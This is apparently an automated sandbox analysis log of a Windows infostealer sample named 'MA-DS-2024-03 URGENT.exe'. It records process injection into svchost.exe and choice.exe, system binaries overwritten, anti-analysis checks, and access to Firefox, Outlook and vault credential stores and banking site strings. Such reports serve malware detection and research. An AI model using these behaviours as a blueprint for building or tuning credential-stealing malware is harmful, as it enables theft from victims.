Source: choice.exe, 00000011.00000002.2500574105.0000000002837000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1971188393.0000000002816000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1973460117.0000000002842000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2500574105.0000000002866000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1971188393.0000000002837000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MA-DS-2024-03 URGENT.exe | ReversingLabs: Detection: 81%
Source: unknown | Process created: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
Source: C:\Windows\SysWOW64\choice.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\AppVClient.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
Source: C:\Windows\SysWOW64\choice.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: MA-DS-2024-03 URGENT.exe | Static file information: File size 1762304 > 1048576
Source: MA-DS-2024-03 URGENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253573729.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source: Binary string: ALG.pdbGCTL source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fbLIkXRoMf.exe, 00000010.00000000.1675751246.000000000003E000.00000002.00000001.01000000.00000005.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2499888410.000000000003E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: Binary string: choice.pdb source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
Source: alg.exe.0.dr | Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr | Static PE information: real checksum: 0x1fb4b should be: 0xa8132
Source: armsvc.exe.0.dr | Static PE information: section name: .didat
Source: alg.exe.0.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00428945 push ecx; ret 0_2_00428958
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00402F12 push es; retf 0_2_00402F13
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0167B180 push 0167B0CAh; ret 0_2_0167B061
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0167B180 push 0167B30Dh; ret 0_2_0167B1E6
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0167B180 push 0167B2F2h; ret 0_2_0167B262
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0167B180 push 0167B255h; ret 0_2_0167B2ED
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0167B180 push 0167B2D0h; ret 0_2_0167B346
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0167B180 push 0167B37Fh; ret 0_2_0167B3B7
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0167520C push 0167528Fh; ret 0_2_0167522D
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 0169852Eh; ret 0_2_01697F3A
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698514h; ret 0_2_01697F66
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01697E66h; ret 0_2_01698057
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 0169817Ah; ret 0_2_0169808B
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 016982E5h; ret 0_2_016980D9
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 0169826Ah; ret 0_2_0169819E
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 0169849Ch; ret 0_2_016981E4
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698321h; ret 0_2_016982E0
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01697FBFh; ret 0_2_0169831F
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01697FA8h; ret 0_2_0169834C
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 016984BAh; ret 0_2_016983E2
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698426h; ret 0_2_016984D8
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698075h; ret 0_2_016984FD
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 0169808Ch; ret 0_2_01698512
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698D45h; ret 0_2_016987D3
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698AB5h; ret 0_2_01698B13
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698784h; ret 0_2_01698CA1
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698DC9h; ret 0_2_01698E1C
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698D14h; ret 0_2_01698E2E
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 01698674h; ret 0_2_01698E4D
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 016988A6h; ret 0_2_01698F76
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01698550 push 0169868Ch; ret 0_2_01698FA4
Source: MA-DS-2024-03 URGENT.exe | Static PE information: section name: .reloc entropy: 7.938039574595139
Source: AppVClient.exe.0.dr | Static PE information: section name: .reloc entropy: 7.943002587659106

Persistence and Installation Behavior

Source: C:\Windows\System32\AppVClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8e8aaae4f259d5dc.bin
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | System file written: C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | File created (dropped file): C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | File created (dropped file): C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | File created (dropped file): C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | File created (dropped file): C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0169CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 0_2_0169CBD0
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004048D7
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00485376
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00423187
Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\choice.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | API/Special instruction interceptor: Address: B6620C
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1252324848.0000000000AED000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254664887.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253646538.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254591727.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254875683.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254769359.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1255155319.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1252476746.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1255061875.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXEEXE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0377096E rdtsc 4_2_0377096E
                Source: C:\Windows\SysWOW64\choice.exe | Window / User API: threadDelayed 3321
                Source: C:\Windows\SysWOW64\choice.exe | Window / User API: threadDelayed 6652
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | API coverage: 5.0 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408 | Thread sleep count: 3321 > 30
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408 | Thread sleep time: -6642000s >= -30000s
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408 | Thread sleep count: 6652 > 30
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408 | Thread sleep time: -13304000s >= -30000s
                Source: C:\Windows\SysWOW64\choice.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0046445A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046C6D1 FindFirstFileW,FindClose, 0_2_0046C6D1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0046C75C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046EF95
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F0F2
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046F3F3
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_004637EF
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463B12
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046BCBC
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004049A0
                Source: G109m407.17.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: G109m407.17.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: G109m407.17.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: G109m407.17.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: G109m407.17.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: fbLIkXRoMf.exe, 00000012.00000002.2503046270.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                Source: G109m407.17.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: G109m407.17.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B96000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: G109m407.17.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
